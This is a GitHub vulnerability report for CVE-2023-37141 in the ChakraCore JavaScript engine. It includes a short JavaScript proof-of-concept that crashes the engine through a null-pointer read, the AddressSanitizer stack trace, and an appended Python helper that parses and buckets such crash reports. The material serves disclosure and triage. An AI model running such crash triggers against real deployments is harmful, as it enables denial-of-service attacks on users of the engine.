CVE-2023-37141: SEGV (/root/ChakraCore-latest/out/Release/ch+0xe248a5) in Js::ProfilingHelpers::ProfiledNewScArray(unsigned int, Js::FunctionBody*, unsigned short) · Issue #6886 · chakra-core/ChakraCore
ChakraCore branch master cbb9b was discovered to contain a segmentation violation via the function Js::ProfilingHelpers::ProfiledNewScArray().
Branch: master
Commit: cbb9b101d18e4c1682ca39a52a201d8e4241ea17
POC is:
function attach(f) {
    // Attach the ch debugger (WScript.Attach) to f from inside a nested call
    (function (r) {
        WScript.Attach(r);
    })(f);
}

async function mainTest(notAttachCall) {
    if (notAttachCall) {
        // The loop's update expression is an array literal; the crash frame below is the
        // profiled array allocation (ProfiledNewScArray) on the interpreter's debug path
        for (let i = 0; i < 1; []) {
            await attach(mainTest);
        }
    } else {
        var i = 10;/**bp:locals()**/   // ch debugger test directive: break here and dump locals
    }
}

mainTest(true);
WScript.Echo("PASSED");
In release build,
./build.sh --sanitize=address --static -j
I get:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==10344==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55cae7e6e8a6 bp 0x7ffe4b5e4470 sp 0x7ffe4b5e4440 T0)
==10344==The signal is caused by a READ memory access.
==10344==Hint: address points to the zero page.
#0 0x55cae7e6e8a5 in Js::ProfilingHelpers::ProfiledNewScArray(unsigned int, Js::FunctionBody*, unsigned short) (/root/ChakraCore-latest/out/Release/ch+0xe248a5)
#1 0x55cae7ac0ca8 in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa76ca8)
#2 0x55cae7a9bb77 in Js::InterpreterStackFrame::DebugProcess() (/root/ChakraCore-latest/out/Release/ch+0xa51b77)
#3 0x55cae7a9a981 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa50981)
#4 0x55cae7a998ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
#5 0x7f6a4d020f99 (<unknown module>)
#6 0x55cae8384ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#7 0x55cae776965a in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f65a)
#8 0x55cae8384ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#9 0x55cae80102d5 in Js::JavascriptGenerator::CallGenerator(void*, Js::ResumeYieldKind) (/root/ChakraCore-latest/out/Release/ch+0xfc62d5)
#10 0x55cae8384ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#11 0x55cae7769446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#12 0x55cae7fcf1dc in Js::JavascriptAsyncFunction::AsyncSpawnStep(Js::JavascriptAsyncSpawnStepFunction*, Js::JavascriptGenerator*, void*, void*) (/root/ChakraCore-latest/out/Release/ch+0xf851dc)
#13 0x55cae7fcf9eb in Js::JavascriptAsyncFunction::EntryAsyncSpawnCallStepFunction(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xf859eb)
#14 0x55cae8384ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#15 0x55cae7769446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
#16 0x55cae82415ee in Js::JavascriptPromise::EntryReactionTaskFunction(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x11f75ee)
#17 0x55cae8384ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#18 0x55cae776b31a in Js::ScriptContext::ProfileModeThunk_DebugModeWrapper(Js::JavascriptFunction*, Js::ScriptContext*, void* (*)(Js::RecyclableObject*, Js::CallInfo, ...), Js::Arguments&) (/root/ChakraCore-latest/out/Release/ch+0x72131a)
#19 0x55cae776936d in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f36d)
#20 0x55cae8384ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
#21 0x55cae8000a61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
#22 0x55cae800072f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
#23 0x55cae74f975a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
#24 0x55cae7421b1a in WScriptJsrt::CallbackMessage::CallFunction(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3d7b1a)
#25 0x55cae73fe804 in RunScript(char const*, char const*, unsigned long, void (*)(void*), void*, char*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b4804)
#26 0x55cae7401913 in ExecuteTest(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3b7913)
#27 0x55cae7402606 in main (/root/ChakraCore-latest/out/Release/ch+0x3b8606)
#28 0x7f6a5151cc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#29 0x55cae7300d59 in _start (/root/ChakraCore-latest/out/Release/ch+0x2b6d59)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/root/ChakraCore-latest/out/Release/ch+0xe248a5) in Js::ProfilingHelpers::ProfiledNewScArray(unsigned int, Js::FunctionBody*, unsigned short)
==10344==ABORTING
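Added triage helper, not part of the issue or of ChakraCore: it parses the fields of an ASan SEGV report in the format quoted above (fault kind, address, access type, symbolised frames) and buckets the crash. The sample is constructed from the first lines of the report above, and the severity rule in `triage` is a heuristic assumption of this example.

```python
import re
# Constructed sample: the head of the AddressSanitizer report quoted in the issue above.
SAMPLE_REPORT = """\
AddressSanitizer:DEADLYSIGNAL
==10344==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55cae7e6e8a6 bp 0x7ffe4b5e4470 sp 0x7ffe4b5e4440 T0)
==10344==The signal is caused by a READ memory access.
==10344==Hint: address points to the zero page.
    #0 0x55cae7e6e8a5 in Js::ProfilingHelpers::ProfiledNewScArray(unsigned int, Js::FunctionBody*, unsigned short) (/root/ChakraCore-latest/out/Release/ch+0xe248a5)
    #1 0x55cae7ac0ca8 in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa76ca8)
    #5 0x7f6a4d020f99 (<unknown module>)
SUMMARY: AddressSanitizer: SEGV (/root/ChakraCore-latest/out/Release/ch+0xe248a5) in Js::ProfilingHelpers::ProfiledNewScArray(unsigned int, Js::FunctionBody*, unsigned short)
"""
ERROR_RE = re.compile(r"==(\d+)==ERROR: AddressSanitizer: ([\w-]+) on unknown address (0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"caused by a (READ|WRITE) memory access")
# Symbolised frame: "#N 0x... in <function> (<module>+0x<offset>)"; unsymbolised frames are skipped
FRAME_RE = re.compile(r"^\s*#(\d+) 0x[0-9a-f]+ in (.+?) \((\S+)\+0x[0-9a-f]+\)$")

def parse_asan_report(text):
    """Extract fault kind, address, access type and symbolised frames from an ASan report."""
    report = {"pid": None, "kind": None, "address": None, "access": None,
              "zero_page": False, "frames": []}
    for line in text.splitlines():
        if m := ERROR_RE.search(line):
            report["pid"], report["kind"] = int(m.group(1)), m.group(2)
            report["address"] = int(m.group(3), 16)
        elif m := ACCESS_RE.search(line):
            report["access"] = m.group(1)
        elif "points to the zero page" in line:
            report["zero_page"] = True
        elif m := FRAME_RE.match(line):
            report["frames"].append((int(m.group(1)), m.group(2), m.group(3)))
    # Derive the zero-page flag from the address too, in case the hint line is absent
    if report["address"] is not None and report["address"] < 0x1000:
        report["zero_page"] = True
    return report

def triage(report):
    """Heuristic bucket (an assumption of this example): a READ of the zero page is a
    null-pointer dereference, i.e. crash/DoS class; a WRITE or a non-zero address needs review."""
    if report["kind"] != "SEGV":
        return "not-a-segv"
    if report["access"] == "READ" and report["zero_page"]:
        return "null-deref-read"
    return "wild-write-review" if report["access"] == "WRITE" else "segv-review"

def crash_site(report):
    """Function and module of the innermost symbolised frame, for deduplicating reports."""
    frames = sorted(report["frames"])
    return (frames[0][1], frames[0][2]) if frames else (None, None)
```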